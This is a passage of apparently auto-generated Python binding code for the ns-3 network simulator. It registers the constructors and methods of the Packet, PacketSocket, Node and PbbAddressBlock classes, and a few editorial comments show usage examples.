## node.h (module 'network'): void ns3::Node::UnregisterProtocolHandler(ns3::Callback<void, ns3::Ptr<ns3::NetDevice>, ns3::Ptr<ns3::Packet const>, unsigned short, ns3::Address const&, ns3::Address const&, ns3::NetDevice::PacketType, ns3::empty, ns3::empty, ns3::empty> handler) [member function]
cls.add_method('UnregisterProtocolHandler',
'void',
[param('ns3::Callback< void, ns3::Ptr< ns3::NetDevice >, ns3::Ptr< ns3::Packet const >, unsigned short, ns3::Address const &, ns3::Address const &, ns3::NetDevice::PacketType, ns3::empty, ns3::empty, ns3::empty >', 'handler')])
## node.h (module 'network'): void ns3::Node::DoDispose() [member function]
cls.add_method('DoDispose',
'void',
[],
visibility='protected', is_virtual=True)
## node.h (module 'network'): void ns3::Node::DoStart() [member function]
cls.add_method('DoStart',
'void',
[],
visibility='protected', is_virtual=True)
return
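# Illustrative note (editorial, not generator output): the registrations above expose
# ns3::Node to Python. A minimal usage sketch, assuming the generated extension is
# importable as ns.network (the module name is an assumption of this note, not taken
# from this file); only methods registered above are used:
#   import ns.network
#   node = ns.network.Node()        # wraps ns3::Node::Node()
#   print(node.GetId())             # uint32_t node id
#   print(node.GetNDevices())       # 0 on a freshly created node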
def register_Ns3ObjectFactoryChecker_methods(root_module, cls):
## object-factory.h (module 'core'): ns3::ObjectFactoryChecker::ObjectFactoryChecker() [constructor]
cls.add_constructor([])
## object-factory.h (module 'core'): ns3::ObjectFactoryChecker::ObjectFactoryChecker(ns3::ObjectFactoryChecker const & arg0) [copy constructor]
cls.add_constructor([param('ns3::ObjectFactoryChecker const &', 'arg0')])
return
def register_Ns3ObjectFactoryValue_methods(root_module, cls):
## object-factory.h (module 'core'): ns3::ObjectFactoryValue::ObjectFactoryValue() [constructor]
cls.add_constructor([])
## object-factory.h (module 'core'): ns3::ObjectFactoryValue::ObjectFactoryValue(ns3::ObjectFactoryValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::ObjectFactoryValue const &', 'arg0')])
## object-factory.h (module 'core'): ns3::ObjectFactoryValue::ObjectFactoryValue(ns3::ObjectFactory const & value) [constructor]
cls.add_constructor([param('ns3::ObjectFactory const &', 'value')])
## object-factory.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::ObjectFactoryValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_const=True, is_virtual=True)
## object-factory.h (module 'core'): bool ns3::ObjectFactoryValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_virtual=True)
## object-factory.h (module 'core'): ns3::ObjectFactory ns3::ObjectFactoryValue::Get() const [member function]
cls.add_method('Get',
'ns3::ObjectFactory',
[],
is_const=True)
## object-factory.h (module 'core'): std::string ns3::ObjectFactoryValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_const=True, is_virtual=True)
## object-factory.h (module 'core'): void ns3::ObjectFactoryValue::Set(ns3::ObjectFactory const & value) [member function]
cls.add_method('Set',
'void',
[param('ns3::ObjectFactory const &', 'value')])
return
def register_Ns3OutputStreamWrapper_methods(root_module, cls):
## output-stream-wrapper.h (module 'network'): ns3::OutputStreamWrapper::OutputStreamWrapper(ns3::OutputStreamWrapper const & arg0) [copy constructor]
cls.add_constructor([param('ns3::OutputStreamWrapper const &', 'arg0')])
## output-stream-wrapper.h (module 'network'): ns3::OutputStreamWrapper::OutputStreamWrapper(std::string filename, std::_Ios_Openmode filemode) [constructor]
cls.add_constructor([param('std::string', 'filename'), param('std::_Ios_Openmode', 'filemode')])
## output-stream-wrapper.h (module 'network'): ns3::OutputStreamWrapper::OutputStreamWrapper(std::ostream * os) [constructor]
cls.add_constructor([param('std::ostream *', 'os')])
## output-stream-wrapper.h (module 'network'): std::ostream * ns3::OutputStreamWrapper::GetStream() [member function]
cls.add_method('GetStream',
'std::ostream *',
[])
return
def register_Ns3Packet_methods(root_module, cls):
cls.add_output_stream_operator()
## packet.h (module 'network'): ns3::Packet::Packet() [constructor]
cls.add_constructor([])
## packet.h (module 'network'): ns3::Packet::Packet(ns3::Packet const & o) [copy constructor]
cls.add_constructor([param('ns3::Packet const &', 'o')])
## packet.h (module 'network'): ns3::Packet::Packet(uint32_t size) [constructor]
cls.add_constructor([param('uint32_t', 'size')])
## packet.h (module 'network'): ns3::Packet::Packet(uint8_t const * buffer, uint32_t size, bool magic) [constructor]
cls.add_constructor([param('uint8_t const *', 'buffer'), param('uint32_t', 'size'), param('bool', 'magic')])
## packet.h (module 'network'): ns3::Packet::Packet(uint8_t const * buffer, uint32_t size) [constructor]
cls.add_constructor([param('uint8_t const *', 'buffer'), param('uint32_t', 'size')])
## packet.h (module 'network'): void ns3::Packet::AddAtEnd(ns3::Ptr<const ns3::Packet> packet) [member function]
cls.add_method('AddAtEnd',
'void',
[param('ns3::Ptr< ns3::Packet const >', 'packet')])
## packet.h (module 'network'): void ns3::Packet::AddByteTag(ns3::Tag const & tag) const [member function]
cls.add_method('AddByteTag',
'void',
[param('ns3::Tag const &', 'tag')],
is_const=True)
## packet.h (module 'network'): void ns3::Packet::AddHeader(ns3::Header const & header) [member function]
cls.add_method('AddHeader',
'void',
[param('ns3::Header const &', 'header')])
## packet.h (module 'network'): void ns3::Packet::AddPacketTag(ns3::Tag const & tag) const [member function]
cls.add_method('AddPacketTag',
'void',
[param('ns3::Tag const &', 'tag')],
is_const=True)
## packet.h (module 'network'): void ns3::Packet::AddPaddingAtEnd(uint32_t size) [member function]
cls.add_method('AddPaddingAtEnd',
'void',
[param('uint32_t', 'size')])
## packet.h (module 'network'): void ns3::Packet::AddTrailer(ns3::Trailer const & trailer) [member function]
cls.add_method('AddTrailer',
'void',
[param('ns3::Trailer const &', 'trailer')])
## packet.h (module 'network'): ns3::PacketMetadata::ItemIterator ns3::Packet::BeginItem() const [member function]
cls.add_method('BeginItem',
'ns3::PacketMetadata::ItemIterator',
[],
is_const=True)
## packet.h (module 'network'): ns3::Ptr<ns3::Packet> ns3::Packet::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::Packet >',
[],
is_const=True)
## packet.h (module 'network'): uint32_t ns3::Packet::CopyData(uint8_t * buffer, uint32_t size) const [member function]
cls.add_method('CopyData',
'uint32_t',
[param('uint8_t *', 'buffer'), param('uint32_t', 'size')],
is_const=True)
## packet.h (module 'network'): void ns3::Packet::CopyData(std::ostream * os, uint32_t size) const [member function]
cls.add_method('CopyData',
'void',
[param('std::ostream *', 'os'), param('uint32_t', 'size')],
is_const=True)
## packet.h (module 'network'): ns3::Ptr<ns3::Packet> ns3::Packet::CreateFragment(uint32_t start, uint32_t length) const [member function]
cls.add_method('CreateFragment',
'ns3::Ptr< ns3::Packet >',
[param('uint32_t', 'start'), param('uint32_t', 'length')],
is_const=True)
## packet.h (module 'network'): static void ns3::Packet::EnableChecking() [member function]
cls.add_method('EnableChecking',
'void',
[],
is_static=True)
## packet.h (module 'network'): static void ns3::Packet::EnablePrinting() [member function]
cls.add_method('EnablePrinting',
'void',
[],
is_static=True)
## packet.h (module 'network'): bool ns3::Packet::FindFirstMatchingByteTag(ns3::Tag & tag) const [member function]
cls.add_method('FindFirstMatchingByteTag',
'bool',
[param('ns3::Tag &', 'tag')],
is_const=True)
## packet.h (module 'network'): ns3::ByteTagIterator ns3::Packet::GetByteTagIterator() const [member function]
cls.add_method('GetByteTagIterator',
'ns3::ByteTagIterator',
[],
is_const=True)
## packet.h (module 'network'): ns3::Ptr<ns3::NixVector> ns3::Packet::GetNixVector() const [member function]
cls.add_method('GetNixVector',
'ns3::Ptr< ns3::NixVector >',
[],
is_const=True)
## packet.h (module 'network'): ns3::PacketTagIterator ns3::Packet::GetPacketTagIterator() const [member function]
cls.add_method('GetPacketTagIterator',
'ns3::PacketTagIterator',
[],
is_const=True)
## packet.h (module 'network'): uint32_t ns3::Packet::GetSerializedSize() const [member function]
cls.add_method('GetSerializedSize',
'uint32_t',
[],
is_const=True)
## packet.h (module 'network'): uint32_t ns3::Packet::GetSize() const [member function]
cls.add_method('GetSize',
'uint32_t',
[],
is_const=True)
## packet.h (module 'network'): uint64_t ns3::Packet::GetUid() const [member function]
cls.add_method('GetUid',
'uint64_t',
[],
is_const=True)
## packet.h (module 'network'): uint8_t const * ns3::Packet::PeekData() const [member function]
cls.add_method('PeekData',
'uint8_t const *',
[],
deprecated=True, is_const=True)
## packet.h (module 'network'): uint32_t ns3::Packet::PeekHeader(ns3::Header & header) const [member function]
cls.add_method('PeekHeader',
'uint32_t',
[param('ns3::Header &', 'header')],
is_const=True)
## packet.h (module 'network'): bool ns3::Packet::PeekPacketTag(ns3::Tag & tag) const [member function]
cls.add_method('PeekPacketTag',
'bool',
[param('ns3::Tag &', 'tag')],
is_const=True)
## packet.h (module 'network'): uint32_t ns3::Packet::PeekTrailer(ns3::Trailer & trailer) [member function]
cls.add_method('PeekTrailer',
'uint32_t',
[param('ns3::Trailer &', 'trailer')])
## packet.h (module 'network'): void ns3::Packet::Print(std::ostream & os) const [member function]
cls.add_method('Print',
'void',
[param('std::ostream &', 'os')],
is_const=True)
## packet.h (module 'network'): void ns3::Packet::PrintByteTags(std::ostream & os) const [member function]
cls.add_method('PrintByteTags',
'void',
[param('std::ostream &', 'os')],
is_const=True)
## packet.h (module 'network'): void ns3::Packet::PrintPacketTags(std::ostream & os) const [member function]
cls.add_method('PrintPacketTags',
'void',
[param('std::ostream &', 'os')],
is_const=True)
## packet.h (module 'network'): void ns3::Packet::RemoveAllByteTags() [member function]
cls.add_method('RemoveAllByteTags',
'void',
[])
## packet.h (module 'network'): void ns3::Packet::RemoveAllPacketTags() [member function]
cls.add_method('RemoveAllPacketTags',
'void',
[])
## packet.h (module 'network'): void ns3::Packet::RemoveAtEnd(uint32_t size) [member function]
cls.add_method('RemoveAtEnd',
'void',
[param('uint32_t', 'size')])
## packet.h (module 'network'): void ns3::Packet::RemoveAtStart(uint32_t size) [member function]
cls.add_method('RemoveAtStart',
'void',
[param('uint32_t', 'size')])
## packet.h (module 'network'): uint32_t ns3::Packet::RemoveHeader(ns3::Header & header) [member function]
cls.add_method('RemoveHeader',
'uint32_t',
[param('ns3::Header &', 'header')])
## packet.h (module 'network'): bool ns3::Packet::RemovePacketTag(ns3::Tag & tag) [member function]
cls.add_method('RemovePacketTag',
'bool',
[param('ns3::Tag &', 'tag')])
## packet.h (module 'network'): uint32_t ns3::Packet::RemoveTrailer(ns3::Trailer & trailer) [member function]
cls.add_method('RemoveTrailer',
'uint32_t',
[param('ns3::Trailer &', 'trailer')])
## packet.h (module 'network'): uint32_t ns3::Packet::Serialize(uint8_t * buffer, uint32_t maxSize) const [member function]
cls.add_method('Serialize',
'uint32_t',
[param('uint8_t *', 'buffer'), param('uint32_t', 'maxSize')],
is_const=True)
## packet.h (module 'network'): void ns3::Packet::SetNixVector(ns3::Ptr<ns3::NixVector> arg0) [member function]
cls.add_method('SetNixVector',
'void',
[param('ns3::Ptr< ns3::NixVector >', 'arg0')])
return
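# Illustrative note (editorial, not generator output): a minimal sketch of the
# ns3::Packet bindings registered above, again assuming the generated extension is
# importable as ns.network (an assumption of this note); only methods registered
# above are used:
#   import ns.network
#   p = ns.network.Packet(100)       # ns3::Packet::Packet(uint32_t size)
#   frag = p.CreateFragment(0, 10)   # first 10 bytes as a new Ptr<Packet>
#   assert p.GetSize() == 100
#   q = p.Copy()                     # independent copy of the packet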
def register_Ns3PacketSocket_methods(root_module, cls):
## packet-socket.h (module 'network'): ns3::PacketSocket::PacketSocket(ns3::PacketSocket const & arg0) [copy constructor]
cls.add_constructor([param('ns3::PacketSocket const &', 'arg0')])
## packet-socket.h (module 'network'): ns3::PacketSocket::PacketSocket() [constructor]
cls.add_constructor([])
## packet-socket.h (module 'network'): int ns3::PacketSocket::Bind() [member function]
cls.add_method('Bind',
'int',
[],
is_virtual=True)
## packet-socket.h (module 'network'): int ns3::PacketSocket::Bind(ns3::Address const & address) [member function]
cls.add_method('Bind',
'int',
[param('ns3::Address const &', 'address')],
is_virtual=True)
## packet-socket.h (module 'network'): int ns3::PacketSocket::Bind6() [member function]
cls.add_method('Bind6',
'int',
[],
is_virtual=True)
## packet-socket.h (module 'network'): int ns3::PacketSocket::Close() [member function]
cls.add_method('Close',
'int',
[],
is_virtual=True)
## packet-socket.h (module 'network'): int ns3::PacketSocket::Connect(ns3::Address const & address) [member function]
cls.add_method('Connect',
'int',
[param('ns3::Address const &', 'address')],
is_virtual=True)
## packet-socket.h (module 'network'): bool ns3::PacketSocket::GetAllowBroadcast() const [member function]
cls.add_method('GetAllowBroadcast',
'bool',
[],
is_const=True, is_virtual=True)
## packet-socket.h (module 'network'): ns3::Socket::SocketErrno ns3::PacketSocket::GetErrno() const [member function]
cls.add_method('GetErrno',
'ns3::Socket::SocketErrno',
[],
is_const=True, is_virtual=True)
## packet-socket.h (module 'network'): ns3::Ptr<ns3::Node> ns3::PacketSocket::GetNode() const [member function]
cls.add_method('GetNode',
'ns3::Ptr< ns3::Node >',
[],
is_const=True, is_virtual=True)
## packet-socket.h (module 'network'): uint32_t ns3::PacketSocket::GetRxAvailable() const [member function]
cls.add_method('GetRxAvailable',
'uint32_t',
[],
is_const=True, is_virtual=True)
## packet-socket.h (module 'network'): int ns3::PacketSocket::GetSockName(ns3::Address & address) const [member function]
cls.add_method('GetSockName',
'int',
[param('ns3::Address &', 'address')],
is_const=True, is_virtual=True)
## packet-socket.h (module 'network'): ns3::Socket::SocketType ns3::PacketSocket::GetSocketType() const [member function]
cls.add_method('GetSocketType',
'ns3::Socket::SocketType',
[],
is_const=True, is_virtual=True)
## packet-socket.h (module 'network'): uint32_t ns3::PacketSocket::GetTxAvailable() const [member function]
cls.add_method('GetTxAvailable',
'uint32_t',
[],
is_const=True, is_virtual=True)
## packet-socket.h (module 'network'): static ns3::TypeId ns3::PacketSocket::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## packet-socket.h (module 'network'): int ns3::PacketSocket::Listen() [member function]
cls.add_method('Listen',
'int',
[],
is_virtual=True)
## packet-socket.h (module 'network'): ns3::Ptr<ns3::Packet> ns3::PacketSocket::Recv(uint32_t maxSize, uint32_t flags) [member function]
cls.add_method('Recv',
'ns3::Ptr< ns3::Packet >',
[param('uint32_t', 'maxSize'), param('uint32_t', 'flags')],
is_virtual=True)
## packet-socket.h (module 'network'): ns3::Ptr<ns3::Packet> ns3::PacketSocket::RecvFrom(uint32_t maxSize, uint32_t flags, ns3::Address & fromAddress) [member function]
cls.add_method('RecvFrom',
'ns3::Ptr< ns3::Packet >',
[param('uint32_t', 'maxSize'), param('uint32_t', 'flags'), param('ns3::Address &', 'fromAddress')],
is_virtual=True)
## packet-socket.h (module 'network'): int ns3::PacketSocket::Send(ns3::Ptr<ns3::Packet> p, uint32_t flags) [member function]
cls.add_method('Send',
'int',
[param('ns3::Ptr< ns3::Packet >', 'p'), param('uint32_t', 'flags')],
is_virtual=True)
## packet-socket.h (module 'network'): int ns3::PacketSocket::SendTo(ns3::Ptr<ns3::Packet> p, uint32_t flags, ns3::Address const & toAddress) [member function]
cls.add_method('SendTo',
'int',
[param('ns3::Ptr< ns3::Packet >', 'p'), param('uint32_t', 'flags'), param('ns3::Address const &', 'toAddress')],
is_virtual=True)
## packet-socket.h (module 'network'): bool ns3::PacketSocket::SetAllowBroadcast(bool allowBroadcast) [member function]
cls.add_method('SetAllowBroadcast',
'bool',
[param('bool', 'allowBroadcast')],
is_virtual=True)
## packet-socket.h (module 'network'): void ns3::PacketSocket::SetNode(ns3::Ptr<ns3::Node> node) [member function]
cls.add_method('SetNode',
'void',
[param('ns3::Ptr< ns3::Node >', 'node')])
## packet-socket.h (module 'network'): int ns3::PacketSocket::ShutdownRecv() [member function]
cls.add_method('ShutdownRecv',
'int',
[],
is_virtual=True)
## packet-socket.h (module 'network'): int ns3::PacketSocket::ShutdownSend() [member function]
cls.add_method('ShutdownSend',
'int',
[],
is_virtual=True)
## packet-socket.h (module 'network'): void ns3::PacketSocket::DoDispose() [member function]
cls.add_method('DoDispose',
'void',
[],
visibility='private', is_virtual=True)
return
def register_Ns3PacketSocketFactory_methods(root_module, cls):
## packet-socket-factory.h (module 'network'): ns3::PacketSocketFactory::PacketSocketFactory(ns3::PacketSocketFactory const & arg0) [copy constructor]
cls.add_constructor([param('ns3::PacketSocketFactory const &', 'arg0')])
## packet-socket-factory.h (module 'network'): ns3::PacketSocketFactory::PacketSocketFactory() [constructor]
cls.add_constructor([])
## packet-socket-factory.h (module 'network'): ns3::Ptr<ns3::Socket> ns3::PacketSocketFactory::CreateSocket() [member function]
cls.add_method('CreateSocket',
'ns3::Ptr< ns3::Socket >',
[],
is_virtual=True)
## packet-socket-factory.h (module 'network'): static ns3::TypeId ns3::PacketSocketFactory::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
return
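# Illustrative note (editorial, not generator output): PacketSocketFactory is normally
# not driven directly; in typical ns-3 usage a socket is created through the factory
# aggregated to a Node. A hedged sketch, assuming ns.network is the generated module
# and that Socket::CreateSocket is bound elsewhere in these bindings:
#   tid = ns.network.PacketSocketFactory.GetTypeId()
#   sock = ns.network.Socket.CreateSocket(node, tid)   # 'node' is an existing ns3::Node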
def register_Ns3PbbAddressBlock_methods(root_module, cls):
cls.add_binary_comparison_operator('==')
cls.add_binary_comparison_operator('!=')
## packetbb.h (module 'network'): ns3::PbbAddressBlock::PbbAddressBlock(ns3::PbbAddressBlock const & arg0) [copy constructor]
cls.add_constructor([param('ns3::PbbAddressBlock const &', 'arg0')])
## packetbb.h (module 'network'): ns3::PbbAddressBlock::PbbAddressBlock() [constructor]
cls.add_constructor([])
## packetbb.h (module 'network'): ns3::Address ns3::PbbAddressBlock::AddressBack() const [member function]
cls.add_method('AddressBack',
'ns3::Address',
[],
is_const=True)
## packetbb.h (module 'network'): std::_List_iterator<ns3::Address> ns3::PbbAddressBlock::AddressBegin() [member function]
cls.add_method('AddressBegin',
'std::_List_iterator< ns3::Address >',
[])
## packetbb.h (module 'network'): std::_List_const_iterator<ns3::Address> ns3::PbbAddressBlock::AddressBegin() const [member function]
cls.add_method('AddressBegin',
'std::_List_const_iterator< ns3::Address >',
[],
is_const=True)
## packetbb.h (module 'network'): void ns3::PbbAddressBlock::AddressClear() [member function]
cls.add_method('AddressClear',
'void',
[])
## packetbb.h (module 'network'): bool ns3::PbbAddressBlock::AddressEmpty() const [member function]
cls.add_method('AddressEmpty',
'bool',
[],
is_const=True)
## packetbb.h (module 'network'): std::_List_iterator<ns3::Address> ns3::PbbAddressBlock::AddressEnd() [member function]
cls.add_method('AddressEnd',
'std::_List_iterator< ns3::Address >',
[])
## packetbb.h (module 'network'): std::_List_const_iterator<ns3::Address> ns3::PbbAddressBlock::AddressEnd() const [member function]
cls.add_method('AddressEnd',
'std::_List_const_iterator< ns3::Address >',
[],
is_const=True)
## packetbb.h (module 'network'): std::_List_iterator<ns3::Address> ns3::PbbAddressBlock::AddressErase(std::_List_iterator<ns3::Address> position) [member function]
cls.add_method('AddressErase',
'std::_List_iterator< ns3::Address >',
[param('std::_List_iterator< ns3::Address >', 'position')])
## packetbb.h (module 'network'): std::_List_iterator<ns3::Address> ns3::PbbAddressBlock::AddressErase(std::_List_iterator<ns3::Address> first, std::_List_iterator<ns3::Address> last) [member function]
cls.add_method('AddressErase',
'std::_List_iterator< ns3::Address >',
[param('std::_List_iterator< ns3::Address >', 'first'), param('std::_List_iterator< ns3::Address >', 'last')])
## packetbb.h (module 'network'): ns3::Address ns3::PbbAddressBlock::AddressFront() const [member function]
cls.add_method('AddressFront',
'ns3::Address',
[],
is_const=True)
## packetbb.h (module 'network'): std::_List_iterator<ns3::Address> ns3::PbbAddressBlock::AddressInsert(std::_List_iterator<ns3::Address> position, ns3::Address const value) [member function]
cls.add_method('AddressInsert',
'std::_List_iterator< ns3::Address >',
[param('std::_List_iterator< ns3::Address >', 'position'), param('ns3::Address const', 'value')])
## packetbb.h (module 'network'): void ns3::PbbAddressBlock::AddressPopBack() [member function]
cls.add_method('AddressPopBack',
'void',
[])
## packetbb.h (module 'network'): void ns3::PbbAddressBlock::AddressPopFront() [member function]
cls.add_method('AddressPopFront',
'void',
[])
## packetbb.h (module 'network'): void ns3::PbbAddressBlock::AddressPushBack(ns3::Address address) [member function]
cls.add_method('AddressPushBack',
'void',
[param('ns3::Address', 'address')])
## packetbb.h (module 'network'): void ns3::PbbAddressBlock::AddressPushFront(ns3::Address address) [member function]
cls.add_method('AddressPushFront',
'void',
[param('ns3::Address', 'address')])
## packetbb.h (module 'network'): int ns3::PbbAddressBlock::AddressSize() const [member function]
cls.add_method('AddressSize',
'int',
[],
is_const=True)
## packetbb.h (module 'network'): void ns3::PbbAddressBlock::Deserialize(ns3::Buffer::Iterator & start) [member function]
cls.add_method('Deserialize',
'void',
[param('ns3::Buffer::Iterator &', 'start')])
## packetbb.h (module 'network'): uint32_t ns3::PbbAddressBlock::GetSerializedSize() const [member function]
cls.add_method('GetSerializedSize',
'uint32_t',
[],
is_const=True)
## packetbb.h (module 'network'): uint8_t ns3::PbbAddressBlock::PrefixBack() const [member function]
cls.add_method('PrefixBack',
'uint8_t',
[],
is_const=True)
## packetbb.h (module 'network'): std::_List_iterator<unsigned char> ns3::PbbAddressBlock::PrefixBegin() [member function]
cls.add_method('PrefixBegin',
'std::_List_iterator< unsigned char >',
[])
## packetbb.h (module 'network'): std::_List_const_iterator<unsigned char> ns3::PbbAddressBlock::PrefixBegin() const [member function]
cls.add_method('PrefixBegin',
'std::_List_const_iterator< unsigned char >',
[],
is_const=True)
## packetbb.h (module 'network'): void ns3::PbbAddressBlock::PrefixClear() [member function]
cls.add_method('PrefixClear',
'void',
[])
## packetbb.h (module 'network'): bool ns3::PbbAddressBlock::PrefixEmpty() const [member function]
cls.add_method('PrefixEmpty',
'bool',
[],
is_const=True)
## packetbb.h (module 'network'): std::_List_iterator<unsigned char> ns3::PbbAddressBlock::PrefixEnd() [member function]
cls.add_method('PrefixEnd',
'std::_List_iterator< unsigned char >',
[])
## packetbb.h (module 'network'): std::_List_const_iterator<unsigned char> ns3::PbbAddressBlock::PrefixEnd() const [member function]
cls.add_method('PrefixEnd',
'std::_List_const_iterator< unsigned char >',
[],
is_const=True)
## packetbb.h (module 'network'): std::_List_iterator<unsigned char> ns3::PbbAddressBlock::PrefixErase(std::_List_iterator<unsigned char> position) [member function]
cls.add_method('PrefixErase',
'std::_List_iterator< unsigned char >',
[param('std::_List_iterator< unsigned char >', 'position')])
## packetbb.h (module 'network'): std::_List_iterator<unsigned char> ns3::PbbAddressBlock::PrefixErase(std::_List_iterator<unsigned char> first, std::_List_iterator<unsigned char> last) [member function]
cls.add_method('PrefixErase',
'std::_List_iterator< unsigned char >',
[param('std::_List_iterator< unsigned char >', 'first'), param('std::_List_iterator< unsigned char >', 'last')])
## packetbb.h (module 'network'): uint8_t ns3::PbbAddressBlock::PrefixFront() const [member function]
cls.add_method('PrefixFront',
'uint8_t',
[],
is_const=True)
## packetbb.h (module 'network'): std::_List_iterator<unsigned char> ns3::PbbAddressBlock::PrefixInsert(std::_List_iterator<unsigned char> position, uint8_t const value) [member function]
cls.add_method('PrefixInsert',
'std::_List_iterator< unsigned char >',
[param('std::_List_iterator< unsigned char >', 'position'), param('uint8_t const', 'value')])
## packetbb.h (module 'network'): void ns3::PbbAddressBlock::PrefixPopBack() [member function]
cls.add_method('PrefixPopBack',
'void',
[])
## packetbb.h (module 'network'): void ns3::PbbAddressBlock::PrefixPopFront() [member function]
cls.add_method('PrefixPopFront',
'void',
[])
## packetbb.h (module 'network'): void ns3::PbbAddressBlock::PrefixPushBack(uint8_t prefix) [member function]
cls.add_method('PrefixPushBack',
'void',
[param('uint8_t', 'prefix')])
## packetbb.h (module 'network'): void ns3::PbbAddressBlock::PrefixPushFront(uint8_t prefix) [member function]
cls.add_method('PrefixPushFront',
'void',
[param('uint8_t', 'prefix')])
## packetbb.h (module 'network'): int ns3::PbbAddressBlock::PrefixSize() const [member function]
cls.add_method('PrefixSize',
'int',
[],
is_const=True)
## packetbb.h (module 'network'): void ns3::PbbAddressBlock::Print(std::ostream & os) const [member function]
cls.add_method('Print',
'void',
[param('std::ostream &', 'os')],
is_const=True)
## packetbb.h (module 'network'): void ns3::PbbAddressBlock::Print(std::ostream & os, int level) const [member function]
cls.add_method('Print',
'void',
[param('std::ostream &', 'os'), param('int', 'level')],
is_const=True)
## packetbb.h (module 'network'): void ns3::PbbAddressBlock::Serialize(ns3::Buffer::Iterator & start) const [member function]
cls.add_method('Serialize',
'void',
[param('ns3::Buffer::Iterator &', 'start')],
is_const=True)
## packetbb.h (module 'network'): ns3::Ptr<ns3::PbbAddressTlv> ns3::PbbAddressBlock::TlvBack() [member function]
cls.add_method('TlvBack',
'ns3::Ptr< ns3::PbbAddressTlv >',
[])
## packetbb.h (module 'network'): ns3::Ptr<ns3::PbbAddressTlv> const ns3::PbbAddressBlock::TlvBack() const [member function]
cls.add_method('TlvBack',
'ns3::Ptr< ns3::PbbAddressTlv > const',
[],
is_const=True)
## packetbb.h (module 'network'): std::_List_iterator<ns3::Ptr<ns3::PbbAddressTlv> > ns3::PbbAddressBlock::TlvBegin() [member function]
cls.add_method('TlvBegin',
'std::_List_iterator< ns3::Ptr< ns3::PbbAddressTlv > >',
[])
## packetbb.h (module 'network'): std::_List_const_iterator<ns3::Ptr<ns3::PbbAddressTlv> > ns3::PbbAddressBlock::TlvBegin() const [member function]
cls.add_method('TlvBegin',
'std::_List_const_iterator< ns3::Ptr< ns3::PbbAddressTlv > >',
[],
is_const=True)
## packetbb.h (module 'network'): void ns3::PbbAddressBlock::TlvClear() [member function]
cls.add_method('TlvClear',
'void',
[])
## packetbb.h (module 'network'): bool ns3::PbbAddressBlock::TlvEmpty() const [member function]
cls.add_method('TlvEmpty',
'bool',
[],
is_const=True)
## packetbb.h (module 'network'): std::_List_iterator<ns3::Ptr<ns3::PbbAddressTlv> > ns3::PbbAddressBlock::TlvEnd() [member function]
cls.add_method('TlvEnd',
'std::_List_iterator< ns3::Ptr< ns3::PbbAddressTlv > >',
[])
## packetbb.h (module 'network'): std::_List_const_iterator<ns3::Ptr<ns3::PbbAddressTlv> > ns3::PbbAddressBlock::TlvEnd() const [member function]
cls.add_method('TlvEnd',
'std::_List_const_iterator< ns3::Ptr< ns3::PbbAddressTlv > >',
[],
is_const=True)
## packetbb.h (module 'network'): std::_List_iterator<ns3::Ptr<ns3::PbbAddressTlv> > ns3::PbbAddressBlock::TlvErase(std::_List_iterator<ns3::Ptr<ns3::PbbAddressTlv> > position) [member function]
cls.add_method('TlvErase',
'std::_List_iterator< ns3::Ptr< ns3::PbbAddressTlv > >',
[param('std::_List_iterator< ns3::Ptr< ns3::PbbAddressTlv > >', 'position')])
## packetbb.h (module 'network'): std::_List_iterator<ns3::Ptr<ns3::PbbAddressTlv> > ns3::PbbAddressBlock::TlvErase(std::_List_iterator<ns3::Ptr<ns3::PbbAddressTlv> > first, std::_List_iterator<ns3::Ptr<ns3::PbbAddressTlv> > last) [member function]
cls.add_method('TlvErase',
'std::_List_iterator< ns3::Ptr< ns3::PbbAddressTlv > >',
[param('std::_List_iterator< ns3::Ptr< ns3::PbbAddressTlv > >', 'first'), param('std::_List_iterator< ns3::Ptr< ns3::PbbAddressTlv > >', 'last')])
## packetbb.h (module 'network'): ns3::Ptr<ns3::PbbAddressTlv> ns3::PbbAddressBlock::TlvFront() [member function]
cls.add_method('TlvFront',
'ns3::Ptr< ns3::PbbAddressTlv >',
[])
## packetbb.h (module 'network'): ns3::Ptr<ns3::PbbAddressTlv> const ns3::PbbAddressBlock::TlvFront() const [member function]
cls.add_method('TlvFront',
'ns3::Ptr< ns3::PbbAddressTlv > const',
[],
is_const=True)
## packetbb.h (module 'network'): std::_List_iterator<ns3::Ptr<ns3::PbbAddressTlv> > ns3::PbbAddressBlock::TlvInsert(std::_List_iterator<ns3::Ptr<ns3::PbbAddressTlv> > position, ns3::Ptr<ns3::PbbTlv> const value) [member function]
cls.add_method('TlvInsert',
'std::_List_iterator< ns3::Ptr< ns3::PbbAddressTlv > >',
[param('std::_List_iterator< ns3::Ptr< ns3::PbbAddressTlv > >', 'position'), param('ns3::Ptr< ns3::PbbTlv > const', 'value')])
## packetbb.h (module 'network'): void ns3::PbbAddressBlock::TlvPopBack() [member function]
cls.add_method('TlvPopBack',
'void',
[])
## packetbb.h (module 'network'): void ns3::PbbAddressBlock::TlvPopFront() [member function]
cls.add_method('TlvPopFront',
'void',
[])
## packetbb.h (module 'network'): void ns3::PbbAddressBlock::TlvPushBack(ns3::Ptr<ns3::PbbAddressTlv> address) [member function]
cls.add_method('TlvPushBack',
'void',
[param('ns3::Ptr< ns3::PbbAddressTlv >', 'address')])
## packetbb.h (module 'network'): void ns3::PbbAddressBlock::TlvPushFront(ns3::Ptr<ns3::PbbAddressTlv> address) [member function]
cls.add_method('TlvPushFront',
'void',
[param('ns3::Ptr< ns3::PbbAddressTlv >', 'address')])
## packetbb.h (module 'network'): int ns3::PbbAddressBlock::TlvSize() const [member function]
cls.add_method('TlvSize',
'int',
[],
is_const=True)
## packetbb.h (module 'network'): ns3::Address ns3::PbbAddressBlock::DeserializeAddress(uint8_t * buffer) const [member function]
cls.add_method('DeserializeAddress',
'ns3::Address',
[param('uint8_t *', 'buffer')],
is_pure_virtual=True, is_const=True, visibility='protected', is_virtual=True)
